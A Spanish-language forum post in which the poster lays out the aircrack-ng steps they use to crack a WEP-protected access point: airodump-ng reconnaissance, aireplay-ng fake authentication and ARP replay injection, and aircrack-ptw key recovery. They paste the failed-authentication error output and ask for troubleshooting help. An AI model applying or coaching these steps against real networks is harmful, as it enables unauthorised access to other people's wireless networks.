Hola buenas a todos, tengo un par de dudas a ver si podeis decirme algo al respecto, me he releido un poco antes de escribir, me he dado cuenta de unas cosas pero empiezo desde el principio.
Yo inicio el procedo de acuerdo con el manualde la siguiente forma:
Los pasos anteriores a estos también los hago pero no quiero ponerlo todo.
Paso 1
airodump-ng rtap0
Con esto comprobamos cual es el canal de ap a atacar y también el bssid.
Paso 2
Luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
En este paso me paso me dice lo siguiente:Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
Paso 3
Y en otra terminal distinta hacemos lo siguiente:
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
Aquí me coge ARP a buen ritmo y llego a tener unos 3 o 4000 todo correcto, ¿no?Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
airodump-ng rtap0
Esto no se para que hay que hacerlo pero lo hago y lo dejo abierto en una nueva terminalPaso 4
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es:
aircrack-ptw archivo.cap
A mi me pasa como a H3rN4n y veo que le han contestado una solución abajo, intentare a hacerlo con esa soluciónThis is aircrack-ptw 1.0.0
For more informations see
http://www.cdc.informatic.tu-darmtadt.de/aircrack-ptwallocatinc a new table
bssid = "mac" key index=0
stats for bssid "mac" keyindex=0 packets=8
Mis Dudas:
Para abrir los archivo.cap hay que usar
airedump -w archivo.cap que se supone que el nombre del archivo.cap esta en el directorio /root/swireless/capturas/? y se supone que esto es para que los Data y los ARP suban mas rapido?
¿se supone que tienes que tener unos 5000 datas mas o menos, ¿no?
Tengo un poco de lio, he estado mirando detenidamente el video y yo hago lo mismo solo que a mi me da el problema en el paso 2, que hago mal?